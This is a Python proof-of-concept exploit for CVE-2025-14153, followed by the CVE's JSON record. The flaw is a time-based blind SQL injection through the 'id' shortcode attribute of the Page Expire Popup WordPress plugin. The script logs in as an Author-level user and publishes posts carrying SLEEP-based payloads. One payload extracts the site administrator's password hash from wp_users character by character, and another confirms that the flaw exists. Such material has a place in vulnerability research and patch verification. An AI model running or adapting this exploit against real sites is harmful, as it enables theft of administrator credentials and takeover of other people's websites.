CVE-2025-14153

import requests import time from urllib.parse import quote # Target WordPress site with Page Expire Popup plugin target_url = "http://target-site.com/" # Authentication credentials (Author-level or higher) username = "attacker" password = "attacker_password" # Login to WordPress session = requests.Session() login_url = target_url + "wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": target_url + "wp-admin/" } session.post(login_url, data=login_data) # Time-based SQL Injection PoC - Extract admin user password hash # The vulnerable shortcode: [page_expire_popup id='<injection>'] def extract_char(position, ascii_value): """Extract a single character from admin password hash using time-based blind SQLi""" # SQL injection payload using SLEEP() for time-based blind injection # This payload checks if ASCII value at position matches payload = f"1' AND (SELECT IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE id=1 LIMIT 1),{position},1))={ascii_value},SLEEP(3),0)) AND '1'='1" # Create post with malicious shortcode post_url = target_url + "wp-admin/post-new.php" post_data = { "post_title": "SQLi Test Post", "post_content": f"[page_expire_popup id='{payload}']", "post_status": "publish" } start_time = time.time() response = session.post(post_url, data=post_data) elapsed_time = time.time() - start_time # If response takes >3 seconds, the condition was true return elapsed_time > 3 # Example: Extract first character of admin password hash # print(extract_char(1, 64)) # Check if first char ASCII value is 64 (@) # Alternative simpler PoC to verify vulnerability exists def verify_vulnerability(): """Verify the SQL injection vulnerability exists""" # Time-based detection payload detect_payload = "1' AND (SELECT SLEEP(5)) AND '1'='1" test_content = f"[page_expire_popup id='{detect_payload}']" post_data = { "post_title": "Vulnerability Test", "post_content": test_content, "post_status": "publish" } start = time.time() session.post(target_url + "wp-admin/post-new.php", data=post_data) elapsed = time.time() - start if elapsed >= 5: print("[+] Vulnerability confirmed! Time-based SQL injection works.") else: print("[-] Vulnerability not detected or already patched.") # Run verification # verify_vulnerability()

{"cve": {"id": "CVE-2025-14153", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:53.220", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Page Expire Popup/Redirection for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' shortcode attribute in all versions up to, and including, 1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}, {"lang": "es", "value": "El plugin Page Expire Popup/Redirection for WordPress para WordPress es vulnerable a inyección SQL basada en tiempo a través del atributo de shortcode 'id' en todas las versiones hasta la 1.0, inclusive, debido a un escape insuficiente en el parámetro proporcionado por el usuario y la falta de preparación suficiente en la consulta SQL existente. Esto hace posible que atacantes autenticados, con acceso de nivel de Autor y superior, añadan consultas SQL adicionales a consultas ya existentes que pueden utilizarse para extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/page-expire-popup/tags/1.0/inc/vfpageexpirepopupstructure.php#L8", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/page-expire-popup/trunk/inc/vfpageexpirepopupstructure.php#L8", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3427583%40page-expire-popup&new=3427583%40page-expire-popup&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0c232b2-f7c8-4a8d-b282-72f61ecfc5da?source=cve", "source": "[email protected]"}]}}